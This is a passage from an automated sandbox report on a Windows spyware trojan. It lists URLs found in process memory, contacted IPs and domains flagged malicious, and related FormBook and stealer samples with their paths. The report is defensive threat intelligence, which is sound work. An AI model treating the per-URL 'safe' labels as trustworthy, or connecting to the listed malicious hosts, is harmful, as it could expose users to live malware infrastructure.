                                                                http://www.legalstrategy.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.wuyezhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.chuncaozhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.pngOtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.rsbi.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.implantcentre.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.xingyuanzhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.easygram.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.qinglizhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.liangmeizhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.yanyuzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.mynewshub.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.startuptalent.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.lovevintage.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.gotogermany.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.hiload.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1dchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.biomedika.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.luxbrand.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.happystories.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.ecosia.org/newtab/chkntfs.exe, 00000006.00000002.4627180441.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.pngchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.athousandwords.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.yanyangzhibo.comchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.bodyonline.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3debchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/js.jschkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.losbravos.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.megaos.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.allprinting.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.methlab.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.qiyuezhibo.netchkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
URL:http://www.huoyazhibo.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.miaozhaozhibo.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.naikuaizhibo.com
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.electrocat.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.implantcentre.net/binding
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.liguizhibo.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.qilinzhibo.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
Source:OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.anmozhibo.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.aguardiente.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.eurosupport.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.xiapizhibo.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
URL:http://www.kleenair.net
Source:chkntfs.exe, 00000006.00000002.4625579447.0000000005962000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4627063553.00000000072C0000.00000004.00000800.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000002.4623853953.0000000003CF2000.00000004.00000001.00040000.00000000.sdmp
Malicious:false
Antivirus Detection:
• Avira URL Cloud: safe
Reputation:unknown
IP | Domain | Country | ASN | ASN Name | Malicious
47.83.1.90 | www.ripbgs.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true
192.64.119.109 | www.laduta.xyz | United States | 22612 | NAMECHEAP-NETUS | true
76.223.67.189 | infovea.tech | United States | 16509 | AMAZON-02US | true
172.65.235.97 | url.gname.net | United States | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | www.einpisalpace.shop | European Union | 13335 | CLOUDFLARENETUS | true
172.67.148.216 | www.overlayoasis.quest | United States | 13335 | CLOUDFLARENETUS | true
192.186.58.31 | www.babyzhibo.net | United States | 132721 | PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL | true
104.21.64.1 | www.mzkd6gp5.top | United States | 13335 | CLOUDFLARENETUS | true
136.243.64.147 | 100millionjobs.africa | Germany | 24940 | HETZNER-ASDE | true
162.0.236.169 | www.explorevision.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
103.247.11.204 | itcomp.store | Indonesia | 58487 | RUMAHWEB-AS-IDRumahwebIndonesiaCVID | true
                                                                    IP
                                                                    127.0.0.1
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1587354
                                                                    Start date and time:2025-01-10 09:09:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 10m 35s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:8
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:1162-201.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 85%
                                                                    • Number of executed functions: 96
                                                                    • Number of non-executed functions: 303
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:11:18 | API Interceptor | 9286861x Sleep call for process: chkntfs.exe modified
09:09:50 | Task Scheduler | Run new task: {2370E142-543F-4375-8827-EC51F4A2CECD} path:
Match | Associated Sample Name / URL | Detection | Threat Name | Context
47.83.1.90 | QUOTATION#050125.exe | malicious | FormBook | www.givvjn.info/nkmx/
47.83.1.90 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.givvjn.info/nkmx/
47.83.1.90 | QUOTATION#050125.exe | malicious | FormBook | www.givvjn.info/nkmx/
47.83.1.90 | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | www.cruycq.info/6jon/
47.83.1.90 | DHL DOCS 2-0106-25.exe | malicious | FormBook | www.cruycq.info/mywm/
47.83.1.90 | Order Inquiry.exe | malicious | FormBook | www.adadev.info/ctdy/
47.83.1.90 | Payment Receipt.exe | malicious | FormBook | www.adadev.info/ctdy/
47.83.1.90 | SW_48912.scr.exe | malicious | FormBook | www.cruycq.info/lf6y/
47.83.1.90 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.gayhxi.info/jfb9/
192.64.119.109 | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | www.laduta.xyz/5mxq/
76.223.67.189 | 236236236.elf | malicious | Unknown | dubai.degree/
76.223.67.189 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.mjmegartravel.online/t2sm/
76.223.67.189 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.mjmegartravel.online/t2sm/
76.223.67.189 | 8dPlV2lT8o.exe | malicious | Simda Stealer | qexyhuv.com/login.php
76.223.67.189 | 7ObLFE2iMK.exe | malicious | Simda Stealer | qexyhuv.com/login.php
76.223.67.189 | UMwpXhA46R.exe | malicious | Simda Stealer | qexyhuv.com/login.php
76.223.67.189 | 1fWgBXPgiT.exe | malicious | Simda Stealer | qexyhuv.com/login.php
76.223.67.189 | arxtPs1STE.exe | malicious | Simda Stealer | qexyhuv.com/login.php
76.223.67.189 | Z8eHwAvqAh.exe | malicious | Simda Stealer | qexyhuv.com/login.php
76.223.67.189 | WlCVLbzNph.exe | malicious | Simda Stealer | qexyhuv.com/login.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.laduta.xyz | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | 192.64.119.109
www.overlayoasis.quest | DHL DOCS 2-0106-25.exe | malicious | FormBook | 172.67.148.216
www.mzkd6gp5.top | QUOTATION#050125.exe | malicious | FormBook | 104.21.32.1
www.mzkd6gp5.top | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 104.21.96.1
www.mzkd6gp5.top | QUOTATION#050125.exe | malicious | FormBook | 104.21.64.1
www.mzkd6gp5.top | CJE003889.exe | malicious | FormBook | 172.67.158.81
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NAMECHEAP-NETUS | https://delivery-pack.com/checkout/?add-to-cart=12 | malicious | Unknown | 63.250.43.146
NAMECHEAP-NETUS | https://clinicasanclemente.com/ap/ | malicious | HTMLPhisher | 68.65.120.84
NAMECHEAP-NETUS | QUOTATION#050125.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | http://hikingandadventures.com/inv/ | malicious | Captcha Phish, HTMLPhisher | 68.65.120.220
NAMECHEAP-NETUS | QUOTATION#050125.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | http://thehalobun.com/ | malicious | HTMLPhisher | 192.64.119.54
NAMECHEAP-NETUS | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | 192.64.119.109
NAMECHEAP-NETUS | DHL DOCS 2-0106-25.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | PO_62401394_MITech_20250601.exe | malicious | FormBook | 199.192.21.169
AMAZON-02US | https://cdn.btmessage.com/ | malicious | HTMLPhisher | 52.211.89.170
AMAZON-02US | 3.elf | malicious | Unknown | 18.151.37.43
AMAZON-02US | http://www.jmclmedia.ph | malicious | Unknown | 13.32.121.98
AMAZON-02US | 5.elf | malicious | Unknown | 34.248.106.44
AMAZON-02US | 6.elf | malicious | Unknown | 13.213.186.124
AMAZON-02US | https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005 | malicious | Unknown | 65.9.66.13
AMAZON-02US | armv6l.elf | malicious | Unknown | 3.65.161.32
AMAZON-02US | https://paybxss.716as7qy3nzyy2eo1omfskt9q0wrkj88.oastify.com/ | malicious | Unknown | 3.248.33.252
AMAZON-02US | https://rachelfix-enum.staging-homes.rewiringamerica.org/ | malicious | Unknown | 18.245.86.4
